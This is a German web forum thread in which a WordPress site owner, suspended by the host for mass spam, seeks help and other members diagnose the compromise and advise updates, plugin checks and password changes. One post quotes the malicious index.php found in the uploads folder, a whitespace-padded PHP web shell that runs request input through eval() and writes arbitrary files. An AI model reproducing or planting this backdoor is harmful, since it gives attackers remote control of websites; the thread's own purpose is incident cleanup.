SPAM Versand Scripte > Sever gesperrt < ???

  • Moin Zusammen,

    hab mir quälend eine WP Seite gebaut, sehr schön, bin auch stolz drauf .... läuft seit 1 jahr wunderbar :D und auf einemmal geht nix mehr.:neutral:
    Im Browser steht immer "You don't have permission to access / on this server."

    Bei den Server Jungs heißt es:
    aufgrund eines erheblichen SPAM Versand (~10.000 Mails) durch eines Ihrer
    Scripte, musste Ihr Web-Benutzer: web435 auf SERVER-10 vorübergehend
    gesperrt werden.

    Bitte teilen Sie uns kurzfristig mit, ab wann Sie das Sicherheitsloch in
    Ihren Scripten schließen können, hierfür haben Sie die Möglichkeit sich
    per FTP auf Ihren Webspace zu verbinden.

    Entsprechende Anhaltspunkte können Sie im FTP-Verzeichnis /log Ihrer
    access- und error-log entnehmen.

    so richtig weiß ich nicht wie ich das Problem angehen soll, versteh das auch nicht so ganz recht.
    Die mail adresse "dominique_molina@martin-bascunana.com" habe ich nie erstellt.

    Beim Google komm ich auch ich recht weiter.

    Hoffe, bitte um Hilfe.

    Dank im vorraus

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • hab jetzt mal mit dem FTP clind nach änderungsdatum sortiert , da das problem wohl die letzte woche aufgetaucht ist.

    das einzige was in dem letzten 3 monate geändert worden ist, ist WP-content>uploads>index.php ... weiß auch gar nicht wie die da hin kommt.

    soll ich die mal löschen? hoffe auf Hilfe

  • Wordpress hat eigentlich keine index.php im uploads-Ordner dabei, das ist zumindest verdächtig. Was steht denn da drin?

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

  • PHP
    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $wbpcw = "96063b22881fd84e24a8ac414d190648"; if(isset($_REQUEST['zhpwkuyl'])) { $nwgbfe = $_REQUEST['zhpwkuyl']; eval($nwgbfe); exit(); } if(isset($_REQUEST['edcioa'])) { $tqgrsz = $_REQUEST['qyzfuja']; $vkgrrix = $_REQUEST['edcioa']; $uczwknwx = fopen($vkgrrix, 'w'); $ndygd = fwrite($uczwknwx, $tqgrsz); fclose($uczwknwx); echo $ndygd; exit(); }
    ?>

    glaube aber das ist das themp, das legt immer autm. Ordner an, nach jahreszahlen und dann nach monaten, darrin dann sind dann die uploads,

    in dem stammordner, upload von WP liegt die besagte index drin

    versteh auch nicht so recht wie das passieren konnte, war das jetzt so ein besagter Hack angriff ?

  • Das lässt sich von hier aus überhaupt nicht analysieren.

    Generell solltest Du aber alle Deine Plugins checken, Updaten und ggf. Deaktivieren. Ein wenig Rechercheaufwand, ob bei dem ein oder anderen Plugin eine Sicherheitslücke aufgetreten ist, hilft weiter.

    Vor nicht allzu langer Zeit hab es eine erhebliche Sicherheitslücke in einer bestimmten Klasse (timthumb), die das Ausführen von beliebigen Code ermöglicht hat. Betroffen waren hier abertausende von Blogs, da viele Plugins und Themes auf diese Klasse gesetzt hatten.

    Wer hier nicht schnell bei der Sache war, wurde nahezu überrannt. In den einschlägigen Foren wurden die URL's von betroffenen Systemen (nicht nur Wordpress) zu Hunderten gepostet.

    Natürlich kann es jetzt sein, dass an mehreren Stellen Deines Blogs schadhafter Code platziert wurde. Ebenso gilt es, die Datenbank genau zu prüfen.

    Wenn Deine Seite erreichbar ist, kannst Du auch mit einem Onlinecheck die wesentlichen Dinge prüfen lassen: http://sitecheck.sucuri.net/scanner/ - das erfasst aber leider nicht alle Problembereiche.

  • Die Ordner legt Wordpress für die Uploads an, das ist so in Ordnung. Diese index.php-Datei ist aber bestimmt ein Schadcode und gehört da nicht hin. Sie ermöglich von außen die Ausführung von praktisch beliebigem PHP-Code (eval() mit einem Wert aus $_REQUEST).

    Allerdings ist das nur das Ergebnis eines Angriffs auf Deine Website und nicht die Ursache. Du kannst die Datei zwar löschen, aber es ist gut möglich, daß sie vom Angreifer einfach wieder neu erstellt wird. Du mußt Dich nun, wie formateins schon schrieb, auf Ursachenforschung begeben.

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)


  • .... läuft seit 1 jahr wunderbar

    Hast du die nötigen Updates in dieser Zeit durchgeführt?
    Hast du dir irgendwelche Plugins für _kontakt_Formulare oder Newsletter installiert?


    Bitte teilen Sie uns kurzfristig mit, ab wann Sie das Sicherheitsloch in
    Ihren Scripten schließen können, hierfür haben Sie die Möglichkeit sich
    per FTP auf Ihren Webspace zu verbinden.

    Wenn du mit den Log-Dateien nicht klarkommen solltest, könntest du dir über das Jobforum einen Dienstleister suchen, der die Sicherheitslücke beseitigt.

    Evtl. kannst du auch mit Datei-Vergleich Änderungen an Scripten selber finden aber für das finden der Sicherheitslücke benötigst
    die Auswertung der Log-Datei.

    Viel Glück

    Ralf

    Mit offenen Augen träumen

  • ich komm leider nicht ins WP Backend ... die haben doch den server gesperrt.

    Kann mir zwar die datein per FTP anschauen, ist aber alles ;-(

    Serverbackup´s werden 5 tage zurückgehalten .... kostet 29,- tacken

    Bin bei eaweb.de und das Team hat mir ein KV von max 80,- genannt um das problem zu beseitigen.

    Was meint ihr dazu? Gab es da schon mal Erfahrungen in so was?, wo bei die kannten sich ja auch gleich aus.

    nuh ja so was großes Problem, wusste gar nicht das man sich da immer auf den neues stand halten muss, was froh die site erstellt zu haben

    danke soweit für die antworten

  • würde das Angebot über 80 Flöckchen annehmen. Aber erst solltest Du Deinen PC überprüfen >> Viren/ Malware. Alles sauber? Dann Passwörter ändern >> ftp Zugang. Wenn der Anbieter alles sauber hat, sofort das Admin Passswort von WP ändern. Mein Tipp: erst einen neuen Admininstrator anlegen mit Passwort. Prüfen, ob alles sauber funktioniert. Dann den "admin" weghauen oder ihm ein Passwort geben, das so absurd ist, dass wirklich niemand "mal eben" drauf kommen kann.

  • würde das Angebot über 80 Flöckchen annehmen.

    Da kann aber keine Absicherung des Systems enthalten sein und auch keine weitere Garantie


    Wenn der Anbieter alles sauber hat, sofort das Admin Passswort von WP ändern.

    Alles packen und sich einen richtigen Provider suchen... Sorry - aber ich halte nichts von Hostern, die ihren Kunden

    "
    Bitte teilen Sie uns kurzfristig mit, ab wann Sie das Sicherheitsloch in
    Ihren Scripten schließen können, hierfür haben Sie die Möglichkeit sich
    per FTP auf Ihren Webspace zu verbinden.

    Entsprechende Anhaltspunkte können Sie im FTP-Verzeichnis /log Ihrer
    access- und error-log entnehmen.
    "
    bei einem Problem schreiben.

    cu

    ralf

    Mit offenen Augen träumen

  • Zitat

    Da kann aber keine Absicherung des Systems enthalten sein und auch keine weitere Garantie

    Mutmaßung. Davon abgesehen: welcher Anbieter bietet Dir ne Garantie auf langfristige Viren/Malwarefreiheit? Das kannst Du auch nicht (Achtung: Zaunpfahl! 8))
    Für 80 Euro ein sauberes System ist ein guter Preis, wenn man den zeitlichen Aufwand gegenrechnet.

  • Hallo Zusammen,

    wenn das noch jemand verfolgt, da es ihn interessiert hier mal das Ergebnis wo der [FONT=Geneva]Schadcode sich eingehackt hat.

    [/FONT][FONT=Geneva]Folgende Dateien waren betroffen:[/FONT]



    hab jetzt alle nicht benötigten [FONT=Geneva]plugins entfernt, die vorhanden aktualisiert.
    WP ist selber noch auf 2.4.2 , kann das so bleiben? Da ich nicht so recht weiß ob das them auf das neue Wp regiert und ich nicht so viel erfahrung hab um neuen probleme zu lösen.

    würde gerne mal wissen wie die ganze sache passieren konnte.

    Kann ich sonst was simples gegen dies wansinn tun?

    Hab soweit keine Plugins gegen so´n sichheitskarm.


    wie auch immer es [/FONT][FONT=Geneva]läuft wieder und das ist gut so ;-)[/FONT]

  • Das merinte ich aber als Einmalinvestition, nicht täglich.

    Bei den 80 Euro konnte einfach keine sinnvolle Absicherung enthalten sein. Du kannst auch nicht in das Tiefkühlregal des Supermarktes greifen und für weniger als zwei Euro eine Lasagne -garantiert-ohne- Pferdefleisch kaufen.

    Mit offenen Augen träumen

  • was ist den mit meiner WP version 2.4 .... ist die sicher ?

    Nee du, seit dieser Version wurden etliche Sicherheitslücken gefixt. Wie sieht es bei deinen Plugins aus, Stand 2005?

    Es ist wirklich absolut wichtig, Wordpress inkl. Plugins und Themes immer aktuell zu halten, wenn möglich zeitnah!

  • bin nicht so der Profi, eher froh das alles so läuft, hat mich ganz schön mühe gekostet.

    Nuh ja für Tips die recht einfach auszuführen sind währe ich dankbar.


    [TABLE="class: wp-list-table widefat plugins, width: 1409"]
    [TR="class: inactive, bgcolor: #F4F4F4"]
    [TD="class: plugin-title"]AkismetAktivieren | Bearbeiten | Löschen[/TD]
    [TD="class: column-description desc"][COLOR=#333333]Used by millions, Akismet is quite possibly the best way in the world to protect your blog from comment and trackback spam. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet API key, and 3) Go to your Akismet configuration page, and save your API key.[/COLOR]

    Version 2.5.7 | Von Automattic | Besuch die Plugin-Seite[/TD]
    [/TR]
    [TR="class: active, bgcolor: #FCFCFC"]
    [TH="class: check-column, align: left"]- Wähle - CCSlider WP[/TH]
    [TD="class: plugin-title"]CCSlider WPDeaktivieren | Bearbeiten[/TD]
    [TD="class: column-description desc"][COLOR=#333333]Add CCSlider to your WP theme[/COLOR]

    Version 2.0.1 | Von Nilok Bose (CosmoCoder) | Besuch die Plugin-Seite[/TD]
    [/TR]
    [TR="class: active, bgcolor: #FCFCFC"]
    [TH="class: check-column, align: left"]- Wähle - WordPress SEO[/TH]
    [TD="class: plugin-title"]WordPress SEOEinstellungen | Deaktivieren | Bearbeiten[/TD]
    [TD="class: column-description desc"][COLOR=#333333]The first true all-in-one SEO solution for WordPress, including on-page content analysis, XML sitemaps and much more.[/COLOR]

    Version 1.4.7 | Von Joost de Valk | Besuch die Plugin-Seite[/TD]
    [/TR]
    [TR="class: active, bgcolor: #FCFCFC"]
    [TH="class: check-column, align: left"]- Wähle - WP-Piwik[/TH]
    [TD="class: plugin-title"]WP-PiwikDeaktivieren | Bearbeiten[/TD]
    [TD="class: column-description desc"][COLOR=#333333]Adds Piwik stats to your dashboard menu and Piwik code to your wordpress footer.[/COLOR]

    Version 0.9.1 | Von André Bräkling | Besuch die Plugin-Seite | Einstellungen[/TD]
    [/TR]
    [TR="class: active, bgcolor: #FCFCFC"]
    [TH="class: check-column, align: left"]- Wähle - WPaudio[/TH]
    [TD="class: plugin-title"]WPaudioDeaktivieren | Bearbeiten[/TD]
    [TD="class: column-description desc"][COLOR=#333333]Play mp3s and podcasts in your posts by converting links and tags into a simple, customizable audio player.[/COLOR]

    Version 3.1 | Von Todd Iceton | Besuch die Plugin-Seite[/TD]
    [/TR]
    [TR="class: active, bgcolor: #FCFCFC"]
    [TH="class: check-column, align: left"]- Wähle - WPML Media[/TH]
    [TD="class: plugin-title"]WPML MediaDeaktivieren | Bearbeiten[/TD]
    [TD="class: column-description desc"][COLOR=#333333]Add multilingual support for Media files[/COLOR]

    Version 1.1.0 | Von ICanLocalize | Besuch die Plugin-Seite[/TD]
    [/TR]
    [TR="class: active, bgcolor: #FCFCFC"]
    [TH="class: check-column, align: left"]- Wähle - WPML Multilingual CMS[/TH]
    [TD="class: plugin-title"]WPML Multilingual CMSDeaktivieren | Bearbeiten | Konfigurieren[/TD]
    [TD="class: column-description desc"][COLOR=#333333]WPML Multilingual CMS. Documentation.[/COLOR]

    Version 2.4.2 | Von ICanLocalize | Besuch die Plugin-Seite[/TD]
    [/TR]
    [TR="class: plugin-update-tr, bgcolor: #FCFCFC"]
    [TD="class: plugin-update colspanchange, colspan: 3"][COLOR=#000000]Eine neue Version von WPML Multilingual CMS ist erschienen. Details der Version ansehen. Eine automatische Aktualisierung ist für dieses Plugin nicht verfügbar.[/COLOR][/TD]
    [/TR]
    [TR="class: active, bgcolor: #FCFCFC"]
    [TH="class: check-column, align: left"]- Wähle - WP Permalauts Extended[/TH]
    [TD="class: plugin-title"]WP Permalauts Extended[/TD]
    [/TR]
    [/TABLE]

  • Mal davon abgesehen, daß es keine Wordpress-Version 2.4 (2.4.x) gab, scheint es mir eher ein Wordpress 3.3.1 zu sein. :-)

    Trotzdem wäre ein Upate auf die aktuelle Version 3.5.1 nicht verkehrt. Es gibt zwar immer das Risiko, daß irgend etwas nach dem Update nicht richtig funktioniert, aber der Sprung von 3.3x auf 3.5.x ist nicht soooo groß, das ich mir da Sorgen machen würde.

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!